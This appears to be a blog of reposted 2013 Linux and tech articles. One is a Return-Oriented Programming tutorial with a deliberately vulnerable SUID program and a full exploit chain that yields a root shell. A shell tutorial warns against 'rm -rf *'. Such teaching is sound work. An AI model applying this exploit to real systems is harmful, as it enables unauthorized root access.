Wednesday, April 24, 2013

How Netflix Works

http://www.zdnet.com/the-biggest-cloud-app-of-all-netflix-7000014298


Netflix, the popular video-streaming service that accounts for a third of all internet traffic during peak hours, isn't just the single largest source of internet traffic. Netflix is also, without doubt, the largest pure cloud service.
Netflix, with more than a billion video delivery instances per month, is the largest cloud application in the world.
At the Linux Foundation's Linux Collaboration Summit in San Francisco, California, Adrian Cockcroft, director of architecture for Netflix's cloud systems team, after first thanking everyone "for building the internet so we can fill it with movies", said that Netflix's Linux, FreeBSD, and open-source based services are "cloud native".
By this, Cockcroft meant that even with more than a billion video instances delivered every month over the internet, "there is no datacenter behind Netflix". Instead, Netflix, which has been using Amazon Web Services since 2009 for some of its services, moved its entire technology infrastructure to AWS in November 2012.
Specifically, depending on customer demand, Netflix's front-end services run on 500 to 1,000 Linux-based Tomcat application servers and NGINX web servers. These are backed by hundreds of Amazon Simple Storage Service (S3) instances and NoSQL Cassandra database servers using the Memcached high-performance, distributed memory object caching system. All of this, and more besides, is distributed across three Amazon Web Services availability zones. Every time you visit Netflix, whether from a device or a web browser, all of these are brought together within a second to show you your video selections.
According to Cockcroft, if something goes wrong, Netflix can continue to run the entire service on two out of the three zones. Netflix didn't simply take Amazon's word for this; it tested total Amazon Elastic Compute Cloud (EC2) zone failures with its open-source Chaos Gorilla software. "We go around trying to break things to prove everything is resistant to it," said Cockcroft. Netflix, in concert with Amazon, is working on multi-region EC2 availability. Once that's in place, even an entire EC2 region failure won't stop Netflix videos from flowing to customers.
That won't be easy, though. The problem is not so much replicating videos and services across EC2 regions; Netflix already has its own content delivery network (CDN), Open Connect, with servers placed at local ISP hubs for that. No, the real problem is setting up the Domain Name System (DNS) so that users are directed to the right Amazon region when one is down. That's because, Cockcroft said, DNS providers have wildly different application programming interfaces (APIs), and those are designed to be hand-managed by an engineer, which makes them not at all easy to automate.
That difficulty isn't stopping Netflix from addressing the problem. Indeed, Netflix plans on failure. As Cockcroft titled his talk, Netflix is about dystopia as a service. The question isn't whether something will fail in the cloud; it's how to keep working no matter how the cloud or specific services fail. Netflix's services are designed so that, when something goes wrong, they degrade gracefully rather than fail completely.
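To make that design goal concrete, here is a minimal, purely illustrative Python sketch of the fail-soft pattern (this is not Netflix's code; the function and data names are invented): if a personalization call fails, the caller falls back to a generic default instead of erroring out.

```python
# Illustrative only; not Netflix's actual code.
def with_fallback(primary, fallback_value):
    """Call primary(); on any failure, degrade gracefully to a default."""
    def call():
        try:
            return primary()
        except Exception:
            return fallback_value  # degraded, but the service keeps working
    return call

def fetch_personalized_rows():
    # Hypothetical dependency that is currently broken.
    raise ConnectionError("recommendation service unavailable")

get_rows = with_fallback(fetch_personalized_rows, ["Popular on Netflix"])
print(get_rows())  # ['Popular on Netflix']
```

The caller never sees the failure; it just gets a less personalized answer, which is the "gradually degrade rather than fail completely" behavior described above.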
As he said, sure, perfection, utopia would be great, but if you're always striving for perfection, you always end up compromising. So instead of striving for perfection, Netflix is continuously updating its systems in real time rather than perfecting them. How fast is that? Netflix wants to "code features in days instead of months; we want to deploy new hardware in minutes instead of weeks; and we want to see instant responses in seconds instead of hours". By deploying on the cloud, Netflix can do all of this.
Sure, sometimes, this doesn't work. In December 2012, for example, a failure in AWS's Elastic Load Balancer in the US-East-Region1 datacenter brought Netflix down during the Christmas holiday.
On the other hand, the Netflix method of producing code sooner rather than later, and running in such a way that the service keeps going even though some components are — not may, but are — broken and inefficient at any given time, has produced a service that is capable of being the single largest consumer of internet bandwidth. Clearly, it's not perfect, but Netflix's design decision to "create a highly agile and highly available service from ephemeral and often broken components" on the cloud works, and as far as Netflix is concerned, for day to day cloud-based video delivery, that's much better than "perfection" could ever be.
Related stories

An Introduction to Returned-Oriented Programming (Linux)

http://resources.infosecinstitute.com/an-introduction-to-returned-oriented-programming-linux


INTRODUCTION:
In 1988, the first buffer overflow was exploited to compromise many systems. More than 20 years later, applications are still vulnerable, despite the efforts made to reduce their exposure.
In the past, the hard part was discovering bugs; nobody cared much about writing exploits because doing so was easy. Nowadays, exploiting buffer overflows is also difficult because of advanced defensive technologies.
Several mitigation strategies are deployed in combination to make exploit development harder than ever: ASLR, non-executable memory sections, and so on.
In this tutorial, we will describe how to defeat or bypass ASLR, NX, ASCII ARMOR, SSP and RELRO protections at the same time, in a single attempt, using a technique called Return-Oriented Programming (ROP).
Let’s begin with some basic/old definitions:
→ NX: non-executable memory sections (stack, heap), which prevent the execution of arbitrary code placed there. This protection is easy to defeat with a correct ret2libc, or with borrowed-chunk techniques.
→ ASLR: Address Space Layout Randomization, which randomizes sections of memory (stack, heap and shared objects). It can be bypassed by brute-forcing the return address.
→ ASCII ARMOR: maps libc addresses so that they start with a NULL byte. This is used to prevent ret2libc attacks, hardening the binary.
→ RELRO: another exploit mitigation technique to harden ELF binaries. It has two modes:
  • Partial RELRO: reorders ELF sections (.got, .dtors and .ctors precede the .data/.bss sections) and makes the GOT safer, but the PLT GOT remains writable, so an attacker can still overwrite it. The non-PLT GOT is read-only.
Compile command: gcc -Wl,-z,relro -o bin file.c
  • Full RELRO: the GOT is remapped as read-only, and it includes all Partial RELRO features.
Compiler command: gcc -Wl,-z,relro,-z,now -o bin file.c

→ SSP: Stack Smashing Protection, which places a canary value on the stack before the saved return address and aborts the program if the canary has been modified.
Our exploit will bypass all of these mitigations reliably.
So let’s go
OVERVIEW OF THE CODE:

Here is the vulnerable code. The binary and code are included at the end of the tutorial.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <errno.h>
#include <unistd.h>

void fill(int, int, int*);

int main(int argc, char** argv)
{
    FILE* fd;
    int in1, in2;
    int arr[2048];
    char var[20];

    if (argc != 2) {
        printf("usage : %s\n", *argv);
        exit(-1);
    }
    fd = fopen(argv[1], "r");
    if (fd == NULL)
    {
        fprintf(stderr, "%s\n", strerror(errno));
        exit(-2);
    }
    memset(var, 0, sizeof(var));
    memset(arr, 0, 2048 * sizeof(int));
    while (fgets(var, 20, fd))
    {
        in1 = atoll(var);
        fgets(var, 20, fd);
        in2 = atoll(var);
        /* fill array */
        fill(in1, in2, arr);
    }
}

void fill(int of, int val, int *tab)
{
    tab[of] = val;
}
First, let's explain what the code does.
It opens a file, reads it line by line, takes in1 as an offset into the array and in2 as the value to store at that offset, then calls the fill function to fill the array:
tab[in1] = in2;
So a buffer overflow occurs when in1 is the offset of the return address, because then we can write whatever we want there.
Let’s compile the vulnerable code:
gcc -o vuln2 vuln2.c -fstack-protector -Wl,-z,relro,-z,now
chown root:root vuln2
chmod +s vuln2
And we check the resulting binary using checksec.sh
user@protostar:~/course$ checksec.sh --file vuln2
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
Full RELRO Canary found NX enabled No PIE No RPATH No RUNPATH vuln2
user@protostar:~/course$
So the binary is hardened, but a motivated attacker can still succeed.
Our write primitive lets us overwrite EIP directly; however, SSP checks whether its stack canary has been modified before the function returns, and if it has, our exploit will fail.
OWNING EIP:

Let’s open the binary with gdb and disassemble the main function:
gdb$ disas main
Dump of assembler code for function main:
0x08048624 <main+0>:	push ebp
...
0x08048754 <main+304>:	mov DWORD PTR [esp+0x202c],eax
0x0804875b <main+311>:	lea eax,[esp+0x2c]
0x0804875f <main+315>:	mov DWORD PTR [esp+0x8],eax
0x08048763 <main+319>:	mov eax,DWORD PTR [esp+0x202c]
0x0804876a <main+326>:	mov DWORD PTR [esp+0x4],eax
0x0804876e <main+330>:	mov eax,DWORD PTR [esp+0x2030]
0x08048775 <main+337>:	mov DWORD PTR [esp],eax
0x08048778 <main+340>:	call 0x80487be
0x0804877d <main+345>:	mov eax,DWORD PTR [esp+0x2034]
0x08048784 <main+352>:	mov DWORD PTR [esp+0x8],eax
...

Let’s create a simple file named ‘simo.txt’ and put the following:
1
10
We make some breakpoints:
gdb$ b *main
Breakpoint 1 at 0x8048624
gdb$ b *0x08048778
Breakpoint 2 at 0x8048778
gdb$ run file
Breakpoint 1, 0x08048624 in main ()
gdb$ x/x $esp
0xbffff7cc:    0xb7eabc76
gdb$ continue
Breakpoint 2, 0x08048778 in main ()
gdb$ x/4x $esp
0xbfffd770:    0x00000001    0x0000000a    0xbfffd79c    0x00000000
gdb$ x/i 0x08048778
0x8048778 <main+340>:    call 0x80487be
gdb$
At the first breakpoint we see the saved return address:
0xbffff7cc holds main's return address;
0xbfffd79c is the address of arr.
If you're familiar with stack frames, you'll notice that we made the call fill(1,10,arr),
which then does the following: arr[1] = 10;
A clever hacker will notice that the offset between the address of arr and the return address is 8240 bytes
(0xbffff7cc - 0xbfffd79c = 8240). Because we are writing integer values, we must divide the result by 4 (sizeof(int)): 8240/4 = 2060.
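The offset arithmetic above is easy to double-check with a few lines of Python, using the addresses observed in the gdb session:

```python
# Addresses from the gdb session above.
ret_addr_loc = 0xbffff7cc  # where main's saved return address lives
arr_addr     = 0xbfffd79c  # address of arr

byte_offset = ret_addr_loc - arr_addr
slot_offset = byte_offset // 4  # the array holds 4-byte ints

print(byte_offset)  # 8240
print(slot_offset)  # 2060
```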
So if we use an offset of 2060, we can write to EIP. Let's check:
Put the following in simo.txt:
2060
1094861636
The result is:
Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: 00000000 EBX: B7FD5FF4 ECX: B7FDF000 EDX: 00000000 o d I t s Z a P c
ESI: 00000000 EDI: 00000000 EBP: BFFFF848 ESP: BFFFF7D0 EIP: 41424344
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop:
Cannot access memory at address 0x41424344
0x41424344 in ?? ()
gdb$
So we successfully own EIP and have bypassed Stack Smashing Protection.
Let’s build our exploit now.
BUILDING THE EXPLOIT:
Our aim now is to build a ROP chain that executes execve(). As we can see, we don't have a GOT entry for this function, and libc is randomized.
So we will first leak a libc function address from the GOT, then do some trivial calculations to get the exact address of execve in libc.
And remember that we cannot overwrite the GOT because of Full RELRO.
readelf -r vuln2
08049fcc 00000107 R_386_JUMP_SLOT 00000000 __errno_location
08049fd0 00000207 R_386_JUMP_SLOT 00000000 strerror
08049fd4 00000307 R_386_JUMP_SLOT 00000000 __gmon_start__
08049fd8 00000407 R_386_JUMP_SLOT 00000000 fgets
08049fdc 00000507 R_386_JUMP_SLOT 00000000 memset
08049fe0 00000607 R_386_JUMP_SLOT 00000000 __libc_start_main
08049fe4 00000707 R_386_JUMP_SLOT 00000000 atoll
08049fe8 00000807 R_386_JUMP_SLOT 00000000 fopen
08049fec 00000907 R_386_JUMP_SLOT 00000000 printf
08049ff0 00000a07 R_386_JUMP_SLOT 00000000 fprintf
08049ff4 00000b07 R_386_JUMP_SLOT 00000000 __stack_chk_fail
08049ff8 00000c07 R_386_JUMP_SLOT 00000000 exit
Let’s leak the address of printf (you can choose any GOT entry).
gdb$ x/x 0x08049fec
0x8049fec <_GLOBAL_OFFSET_TABLE_+44>:    0xb7edbf90
gdb$ p execve
$9 = {<text variable, no debug info>} 0xb7f2c170
gdb$ p 0xb7f2c170-0xb7edbf90
$10 = 328160
gdb$
The offset between printf and execve is 328160.
So if we add 328160 to printf's libc address, we get execve's libc address dynamically, by leaking the printf address loaded in the GOT.
execve = printf@libc+ 328160
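The leak-and-relocate arithmetic can be sanity-checked in Python with the addresses from the gdb session above (on a live target only the leaked printf address is known; the offset stays constant for a given libc build):

```python
printf_libc = 0xb7edbf90  # leaked from printf's GOT entry
execve_libc = 0xb7f2c170  # from `p execve` in gdb

offset = execve_libc - printf_libc
print(offset)  # 328160

# At exploit time we recompute execve from the leak alone:
print(hex(printf_libc + 328160))  # 0xb7f2c170
```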
So we must find some ROP gadgets.
The next step is finding useful gadgets to build a chain of instructions; we'll use ROPEME to do that.
We generate a .ggt file which contains instruction sequences, each ending in a ret.
Our purpose is to execute a few instructions, then return into code we control.
ROPeMe> generate vuln 6
We need those useful gadgets to build our exploit.
0x804886eL: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx
0x804861fL: call eax ; leave ;;
0x804849cL: pop eax ; pop ebx ; leave ;;
So let’s build our ROP chain using those gadgets.
Our attack: load 328160 into EAX and 0x138e9ff4 into EBX. You’ll ask me, what is 0x138e9ff4?
Well, we have a gadget like this:
0x804886eL: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx
Since ebx-0xb8a0008 must equal printf@got, ebx = printf@got + 0xb8a0008 = 0x138e9ff4.
So EAX = 328160 and EBX = 0x138e9ff4.
When «add eax [ebx-0xb8a0008]» is executed, EAX will contain the address of execve, resolved dynamically.
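The EBX value is just the gadget's addressing solved for printf@got (0x08049fec in the readelf output above), which a quick check confirms:

```python
printf_got = 0x08049fec  # printf's GOT slot, from `readelf -r vuln2`

# The gadget reads [ebx - 0xb8a0008], so ebx must be printf@got + 0xb8a0008.
ebx = printf_got + 0xb8a0008
print(hex(ebx))  # 0x138e9ff4
```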
After that, we use the call eax gadget to execute our command; don't forget to put the correct parameters on the stack.
There is a small problem which must be resolved. When the leave instruction is executed, ESP is reloaded from main's saved frame pointer and no longer points into our controlled data. The solution is easy; as we did earlier, some trivial calculation tells us where ESP will point.
0x8048778 <main+340>:    call 0x80487be
Breakpoint 1, 0x08048778 in main ()
gdb$ x/4x $esp
0xbfffd770:    0x0000080c    0x0804849c    0xbfffd79c    0x00000000
We continue.
0x804849f <_init+47>:    ret
0x0804849f in _init ()
gdb$ x/x $esp
0xbffff84c:    0x0804886e
When «leave» is executed, ESP points to another area, one we do not yet control.
Let's predict exactly where ESP points: as we did earlier, we subtract the address of arr from ESP and divide by 4: (0xbffff84c - 0xbfffd79c)/4 = 2092.
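As with the earlier return-address offset, the new slot index can be verified directly:

```python
esp_after_leave = 0xbffff84c  # where ESP points after the `leave`
arr_addr        = 0xbfffd79c  # address of arr

print((esp_after_leave - arr_addr) // 4)  # 2092
```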
So our payload will look like this:
#!/usr/bin/python
r = "\n"
p = str(2060) +r # offset of return address
p += str(0x804849c) +r # pop eax ; pop ebx ; leave ;;
p += str(2061) +r
p += str(328160)+r # EAX
p += str(2062)+r
p += str(0x138e9ff4)+r # EBX
p += str(2092) +r
p += str(0x804886e)+r # add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx
p += str(2096) +r
p += str(0x41414141) +r
o = open("simo.txt","wb")
o.write(p)
o.close()
Let’s see what happens:
Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: B7F2C170 EBX: 00000002 ECX: B7FDF000 EDX: 00000000 o d I t S z a p c
ESI: 00000000 EDI: 00000000 EBP: BFFFF874 ESP: BFFFF860 EIP: 41414141
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop:
Cannot access memory at address 0x41414141
0x41414141 in ?? ()
gdb$ x/x $eax
0xb7f2c170 :    0x8908ec83
gdb$
It works!
So EAX contains the address of execve, and we still control EIP. The next step is to find a printable string and two NULL values to use as parameters for execve.
We search inside the binary using objdump:
user@protostar:~/course$ objdump -s vuln2 |more
vuln2: file format elf32-i386
Contents of section .interp:
8048134 2f6c6962 2f6c642d 6c696e75 782e736f /lib/ld-linux.so
8048144 2e3200 .2.
Contents of section .note.ABI-tag:
8048148 04000000 10000000 01000000 474e5500 ............GNU.
8048158 00000000 02000000 06000000 12000000 ................
0x8048154 points to a printable ASCII string, «GNU», and 0x8048158 points to NULL bytes.
Our call is then execve(0x8048154, 0x8048158, 0x8049fb0), i.e. execve("GNU", a pointer to NULL, a pointer to NULL). But we don't have a GNU command, so we will create a wrapper named GNU.c:
#include <unistd.h>
/* compile : gcc -o GNU GNU.c */
int main()
{
    char *args[] = {"/bin/sh", NULL};
    execve(args[0], args, NULL);
}
Then add the path where GNU is located to the $PATH environment variable:
export PATH=/yourpath/:$PATH
Our final exploit :
#!/usr/bin/python
r = "\n"
p = str(2060) +r # offset of return address
p += str(0x804849c) +r # pop eax ; pop ebx ; leave ;;
p += str(2061) +r
p += str(328160)+r # offset between printf and execve
p += str(2062)+r
p += str(0x138e9ff4)+r # printf@got + 0xb8a0008
p += str(2092) +r
p += str(0x804886e)+r # add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx
p += str(2096) +r
p += str(0x804861f) +r #: call eax ; leave ;;
p += str(2097) +r
p += str(0x8048154) +r # "GNU"
p += str(2098)+r
p += str(0x8048158) +r # pointer to NULL
p += str(2099)+r
p += str(0x8049fb0) +r # pointer to NULL
o = open("simo.txt","wb")
o.write(p)
o.close()
let’s run our attack :
user@protostar:~/course$ python exploit.py
user@protostar:~/course$ ./vuln2 simo.txt
# whoami
root
#
It works! We successfully got a shell with SUID root privileges, and we bypassed all the exploit mitigations in one attempt.
If you open the binary in gdb across runs, you'll notice that the libc addresses change from one execution to the next, yet our exploit remains reliable and resolves execve every time.
Conclusion:
We presented an attack against programs vulnerable to stack overflows that bypasses two of the most widely used protections (NX and ASLR) along with several others (Full RELRO, ASCII ARMOR, SSP).
With our exploit, we extracted from the vulnerable process's address space the randomized addresses of some libc functions, then used them to mount a classical ret2libc-style attack.
References:

Payload Already Inside: Data Reuse for ROP Exploits
http://force.vnsecurity.net/download/longld/BHUS10_Paper_Payload_already_inside_data_reuse_for_ROP_exploits.pdf

Surgically returning to randomized lib(c)
http://security.dico.unimi.it/~gianz/pubs/acsac09.pdf

Mastering the Linux Shell : Killing Processes and Dire Warnings

http://marcelgagne.com/content/mastering-linux-shell-killing-processes-and-dire-warnings


Today's installment of Mastering the Linux Shell comes with a warning. Actually, it comes with a few warnings. And a viewer advisory. Well, actually, a reader advisory.
You see, some of what I cover sounds pretty violent and discretion is advised. I'll be talking about processes and their children, and the need, at times, to kill a process. You may even have to kill child processes, so this is not for the squeamish. If it makes you feel any better, these processes are just code running somewhere in memory. It's not like Tron at all. They're just bits of information, and when you power off your machine, they die anyway. I should point out that many long-time Linux users never power down their machines. Most people think it's because you really don't need to shut down or reboot Linux systems all that often. For some, however, it's because they can't bear to kill processes.
Enough silliness. On to the serious stuff.

Killing Processes

When we talk about killing a process, the common understanding is that you end the process. The program is closed and no longer running. That can be one way you kill processes, but there's more to it than that. You can usually interrupt a foreground process with the Control-C sequence but that does not work with background processes.  The command used to terminate a process is called kill, which as it turns out, is an unfortunate name for a command which does more than just terminate processes.   By design, kill sends signals to jobs.   That signal is sent as an option (after a hyphen) to a process ID. The process ID can be found using the ps command as I demonstrated in an earlier article.
kill -signal_no PID
For instance, I can send the SIGHUP signal to process 7612 like this.
kill -1 7612
Signals are messages.  They are usually referenced numerically, as with the ever popular "kill -9" signal, but there are a number of others.  The ones you are most likely to use are 1, 9, and 15.  These signals can also be referenced symbolically with these names.
Signal 1 is SIGHUP.   This is normally used with system processes such as inetd and other daemons.   With these types of processes, a SIGHUP tells the process to hang up, reread its configuration files, and restart.  Most applications will just ignore this signal.
Signal 9 is SIGKILL, an unconditional termination of the process.  Some admins I've known call this “killing with extreme prejudice”.  The process is not asked to stop, close its files, and terminate gracefully.  It is simply killed.  This should be your last resort approach to killing a process and works 99% of the time.   Only a small handful of conditions will ever ignore the -9 signal.
Signal 15, the default, is SIGTERM, a call for normal program termination.  The system is asking the program to wrap it up and stop doing whatever it was doing.
Remember when we suspended a process earlier using Control-Z?  That was another signal.  Try this to get a feel of how this works.  If you are running in an X display, start a digital xclock with a seconds display updated every second.
xclock -digital -update 1 &

You should see the second digits counting away.  Now, find its process ID with "ps ax | grep xclock".  We'll pretend the process ID is 12136.  Let's suspend that process with SIGSTOP.
kill -STOP 12136
The digits have stopped incrementing, right?  Here's a cool trick. Try closing the window for the xclock by clicking on the x in the corner. It doesn't work, does it? I'll let you think about that one. For now, let’s restart the xclock.
kill -CONT 12136
As you can see, kill is probably a bad name for a command that can suspend a process, then bring it back to life.  For a complete list of signals and what they do, look in the man pages with this command.
man 7 signal
If you wanted to kill a process by specifying the symbolic signal, you would use the signal name minus the SIG prefix.  For instance, to send the -1 signal to cupsd, I could do this instead.
kill -HUP `pidof cupsd`
Note that those are back-quotes around the command string above. The pidof command does exactly what you think: it returns the PID of the cupsd daemon.
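The same signals can also be sent programmatically. Here is a small Python sketch, using the standard os, signal and subprocess modules, that mirrors the kill commands above by suspending, resuming and then terminating a throwaway sleep process:

```python
import os
import signal
import subprocess

# Start a disposable background process to experiment on.
proc = subprocess.Popen(["sleep", "60"])

os.kill(proc.pid, signal.SIGSTOP)  # suspend it, like `kill -STOP <pid>`
os.kill(proc.pid, signal.SIGCONT)  # resume it,  like `kill -CONT <pid>`
os.kill(proc.pid, signal.SIGTERM)  # ask it to terminate (signal 15)

proc.wait()
print(proc.returncode)  # -15: the child was ended by SIGTERM
```

A negative return code is Python's way of reporting which signal ended the child, which is handy for confirming that your SIGTERM, and not something else, did the deed.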

Dire Warnings

Since I've told you about terminating processes, it seems fitting that I revisit another, much earlier topic, where I discussed deleting files.  When killing processes, you want to be very careful. Some processes, when terminated, will terminate your entire desktop session, your network connection, or the entire running machine. Look for the process you need to terminate, then act accordingly. When operating as the superuser (i.e. the 'root' user), you can do anything, and the system naturally assumes you know what you are doing. It's true when dealing with processes and it's true when deleting files.
I've used the explanation that everything on your Linux system is a file, but then I also said that there were different types of files.  In order to work with directory files, we have the following batch of commands which are ideally suited to this.
pwd (Print Working Directory)
cd (Change to a new Directory)
mkdir (MaKe or create a new DIRectory)
mv (MoVe directories, or like files, rename them)
rmdir (ReMove or delete DIRectories.)
One way to create a complicated directory structure is to use mkdir to create each and every directory.
mkdir /dir1
mkdir /dir1/sub_dir
mkdir /dir1/sub_dir/yetanotherdir
What you could do instead is save yourself a few keystrokes and use the "-p" flag instead.  This tells "mkdir" to create any parent directories that might not already exist.   If you happen to like a lot of verbiage from your system, you could also add the "--verbose" flag for good measure.
mkdir -p /dir1/sub_dir/yetanotherdir
To rename or move a directory, the format is the same as you used with a file or group of files.  Use the mv command.
mv path_to_dir new_path_to_dir
Removing a directory can be just a bit more challenging.   The command "rmdir" seems simple enough.  In fact, removing this directory was no problem.
$ rmdir trivia_dir
Removing this one, however, gave me this error.
$ rmdir junk_dir
rmdir: junk_dir: Directory not empty
You can only use rmdir to remove an empty directory.  There is a "-p" option (as in parents) that lets you remove a directory structure.  For instance, you could remove a couple of levels like this.
$ rmdir -p junk_dir/level1/level2/level3
All the directories from junk_dir on down will be removed, but only if they are empty of files. This is where it gets interesting. And dangerous.  The better approach is to use the rm command with the "-r", or recursive option.  Unless you are deleting only a couple of files or directories, you will want to use the "-f" option as well.
$ rm -rf junk_dir

And now, the DIRE WARNING!

Beware the "rm -rf *" command!  Better yet, never use it.  If you must delete a whole directory structure, change directory to the one above it and explicitly remove the directory.  This is also the first and best reason to do as much of your work as possible as a normal user and not root.  Since root is all powerful, it is quite capable of completely destroying your system.  Imagine that you are in the top level directory ( / ) instead of /home/myname/junkdir when you initiated that recursive delete.  It is far too easy to make this kind of mistake.  Beware.
With that last bit of warning, I leave you until the next instalment. Many thanks to all of you who have followed me in this series. As usual, if you wish to comment, please do so here on Google Plus or over here on Facebook and add me to your circles or friend list if you haven't already done so. Also, make sure you sign up for the mailing list over here so that you're always on top of what you want to be on top of.  Until next time . . .
A votre santé! Bon appétit!

Thursday, April 18, 2013

Improve Power Usage / Battery Life In Linux With TLP

http://www.webupd8.org/2013/04/improve-power-usage-battery-life-in.html


There are various tweaks that you can apply to your laptop to save battery power, but many of them depend on the hardware, Linux distribution, some are outdated or too hard to apply for regular users and so on. TLP is an advanced power management command line tool for Linux that tries to apply these settings / tweaks for you automatically, depending on your Linux distribution and hardware.

Ubuntu laptop


TLP applies the following settings depending on the power source (battery / ac):
  • Kernel laptop mode and dirty buffer timeouts;
  • Processor frequency scaling including "turbo boost" / "turbo core";
  • Power aware process scheduler for multi-core/hyper-threading;
  • Hard disk advanced power management level and spin down timeout (per disk);
  • SATA aggressive link power management (ALPM);
  • PCI Express active state power management (PCIe ASPM) – Linux 2.6.35 and above;
  • Runtime power management for PCI(e) bus devices – Linux 2.6.35 and above;
  • Radeon KMS power management – Linux 2.6.35 and above, not fglrx;
  • Wifi power saving mode – depending on kernel/driver;
  • Power off optical drive in drive bay (on battery).

Additional TLP functions:
  • I/O scheduler (per disk);
  • USB autosuspend with blacklist;
  • Audio power saving mode – hda_intel, ac97;
  • Enable or disable integrated wifi, bluetooth or wwan devices upon system startup and shutdown;
  • Restore radio device state on system startup (from previous shutdown);
  • Radio device wizard: switch radios upon network connect/disconnect and dock/undock;
  • Disable Wake On LAN;
  • WWAN state is restored after suspend/hibernate;
  • Undervolting of Intel processors – requires kernel with PHC-Patch;
  • Battery charge thresholds – ThinkPads only;
  • Recalibrate battery – ThinkPads only.

TLP applies these settings automatically on startup and every time you change the power source. To use it, all you have to do is install TLP. However, there are some settings you can apply manually, overriding the TLP defaults, such as enabling or disabling the WiFi, Bluetooth or WWAN (3G or UMTS) radios, switching between AC and battery settings regardless of the actual power source, applying autosuspend for all attached USB devices, or powering off the optical drive.

There are also some ThinkPad-only settings that you can use, like temporarily changing the battery charge thresholds, temporarily setting the charge thresholds back to factory settings, recalibrating the battery, and more.

For more about these settings, see the TLP homepage or consult the TLP manpage (type "man tlp" in a terminal).

I've only been using TLP for a couple of hours, so I can't say yet how efficient this tool is regarding battery life, but I've noticed that my laptop's temperature is lower than before using TLP. You may have seen an icon on my Unity launcher in some posts on WebUpd8, which displays a number that's usually around 65 - that's Psensor, and it displays the CPU temperature (Celsius; 65°C is about 149 degrees Fahrenheit) - here's an example. Well, after installing TLP, the CPU temperature didn't go past 55 degrees Celsius (about 131 degrees Fahrenheit), at least not yet, with regular desktop usage: using a browser with quite a few tabs open, a text editor and a few AppIndicators running, under Unity. This, of course, depends on various factors, but so far this tool seems to do its job. Also, some Reddit users have reported that TLP makes quite a big difference.



Install TLP in Ubuntu


Before proceeding with the installation, there are a couple of things you need to do:
  • firstly, if you've added any power saving settings / scripts (e.g.: in /etc/rc.local), remove them or else TLP may not work properly;
  • remove laptop-mode-tools ("sudo apt-get remove laptop-mode-tools").

Ubuntu (and Linux Mint, etc.) users can install TLP by using its official PPA. Add the PPA and install TLP using the following commands:
sudo add-apt-repository ppa:linrunner/tlp
sudo apt-get update
sudo apt-get install tlp tlp-rdw

TLP will automatically start  upon system startup, but to avoid having to restart the system to get it running for the first time, you can start it (required only the first time) using the following command:
sudo tlp start

There are some optional packages you can install for some extra features:
  • smartmontools - needed to display disk drive S.M.A.R.T. data;
  • ethtool - needed to disable wake on lan.

Install these tools (available in the Ubuntu repositories) using the following command:
sudo apt-get install smartmontools ethtool

There are also some ThinkPad only, optional packages you may need:
  • tp-smapi-dkms - needed for battery charge thresholds and ThinkPad specific status output of tlp-stat;
  • acpi-call-tools - acpi-call is needed for battery charge thresholds on Sandy Bridge and newer models (X220/T420, X230/T430, etc.).

Install these packages using the following command:
sudo apt-get install tp-smapi-dkms acpi-call-tools

Other Linux distributions: there are TLP packages for Debian 6.0+, Arch Linux, openSUSE 11.4+, Gentoo and Fedora 16+ - see the TLP homepage for installation instructions. You can grab the source and report bugs on GitHub.

Make sure to also read the TLP FAQ.

Wednesday, April 17, 2013

Parallella: The $99 Linux supercomputer

http://www.zdnet.com/parallella-the-99-linux-supercomputer-7000014036


Chip company Adapteva announced on April 15th at the Linux Collaboration Summit in San Francisco, California, that it has built its first Parallella parallel-processing boards for Linux supercomputing, and that it will be sending them to its 6,300 Kickstarter supporters and other customers by this summer.
Say hi to Parallella, the $99 Linux-powered supercomputer. (Image: The Linux Foundation)
Linux has long been the number one supercomputer operating system. But while you could build your own Linux supercomputer using commercial off-the-shelf (COTS) products, it wouldn't be terribly fast. You needed hardware that could support massively parallel computing — the cornerstone of modern supercomputing.
What Adapteva has done is create a credit-card-sized parallel-processing board. This comes with a dual-core ARM A9 processor and a 64-core Epiphany Multicore Accelerator chip, along with 1GB of RAM, a microSD card, two USB 2.0 ports, 10/100/1000 Ethernet, and an HDMI connection. If all goes well, by itself, this board should deliver about 90 GFLOPS of performance, or — in terms PC users understand — about the same horsepower as a 45GHz CPU.
This board will use Ubuntu Linux 12.04 for its operating system. To put all this to work, the platform reference design and drivers are now available.
Why would you want a $99 supercomputer?
Well, besides the fact that it would be really cool, Adapteva CEO Andreas Olofsson explained:
Historically, serial processing [conventional computing] improved so quickly that in most applications, there was no need for massively parallel processing. Unfortunately, serial processing performance has now hit a brick wall, and the only practical path to scaling performance in the future is through parallel processing. To make parallel software applications ubiquitous, we will need to make parallel hardware accessible to all programmers, create much more productive parallel programming methods, and convert all serial programmers to parallel programmers.
And of course, Olofsson added, to "make parallel computing accessible to everyone so we can speed up the adoption of parallel processing in the industry", the Parallella had to be created. Olofsson admitted that his company couldn't have done it by itself. The project required, and got, the support of other hardware OEMs, including Xilinx, Analog Devices, Intersil, Micron, Microchip, and Samtec. These companies have enabled Adapteva to bring its first pre-production boards to San Francisco, and soon, to its eager programmer customers.

Protect your network with Snort

http://www.linuxuser.co.uk/tutorials/protect-your-network-with-snort


       Whether meaning to be mischievous or malicious, hackers can wreak havoc on your network. Fortunately, Snort makes it easy to spot them and set up protection


Snort is an intrusion detection system (IDS). It works by monitoring network activity and raising an alert in the case of suspicious activity. What constitutes suspicious activity is definable by rules, and it comes with a massive selection. It can protect a single machine from attacks or even an entire network. This guide will show you how to set up and use Snort and also take you through some typical security scenarios in which Snort will prove useful.
As you get to know Snort, you might consider setting up a testing environment using virtual machines. A simple approach would be to use a virtual machine that has its network adaptor configured to be visible on your network (the setting is called ‘bridged adaptor’ in VirtualBox, for example). The techniques outlined here are not dangerous, but they can be considerably easier to get working within a controllable environment.
Snort runs on a single machine, but can monitor an entire network

Resources

Snort
The Snort manual
A second network card (optional)

Step by Step

Step 01

Install Snort
Install Snort with ‘sudo apt-get install snort’. If you need the very latest version, visit the website and fetch, build and install it.

